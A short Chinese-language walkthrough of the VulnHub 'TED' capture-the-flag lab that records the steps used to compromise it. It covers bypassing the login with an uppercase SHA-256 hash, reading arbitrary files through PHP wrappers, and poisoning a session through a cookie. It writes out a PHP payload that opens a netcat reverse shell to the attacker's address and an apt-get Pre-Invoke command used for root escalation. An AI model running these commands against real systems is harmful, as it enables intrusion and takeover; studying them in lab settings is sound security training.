vulnhub-TED靶場過程記錄
VSole2021-08-06 10:37:30
靶場地址:https://download.vulnhub.com/ted/Ted.7z
靶場設置 使用VM打開


掃描靶場網段,得到ip地址

訪問網址是個登陸框

掃描目錄無果后,開始對登錄框進行探索。
隨便輸入個密碼后,發現密碼或者密碼hash錯誤,嘗試多樣的密碼對比圖如下


看來密碼是admin沒錯了,然后應該是hash加密后訪問。
這里耗盡了大量的時間,得出來了結果(還是朋友做出來的,難受)
這里使用的是sha256加密,然后加密的字符串,字符轉換大寫


在在線網站進行大小寫轉換

一發入魂

獲得下一步提示

在search存在任意文件讀取



閱覽cookie.php發現回顯了文件

這里有一個authenticate.php

正常讀取會出現退出登陸的情況,使用php偽協議讀取到了文件

源碼如下

同樣的方式讀取home

Home文件中有這么一句話
$_SESSION['user_pref'] = $_COOKIE['user_pref'];
任意文件讀取到sessions目錄
第一種
寫入一句話木馬

鏈接蟻劍

但是上傳不了腳本


一時間不知道咋弄了
第二種
%3C?php%20exec('nc%20192.168.17.128
%202222%20-e%20/bin/bash')%20?%3E
反彈nc

回到sessions哪里,因為有nc

對shell進行升級
SHELL=/bin/bash script -q /dev/null

然后卡殼,最終解決如下
記錄如下
輸入
sudo apt-get update -o APT::Update::Pre-Invoke::="/bin/bash -i"
提權

本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
VSole
網絡安全專家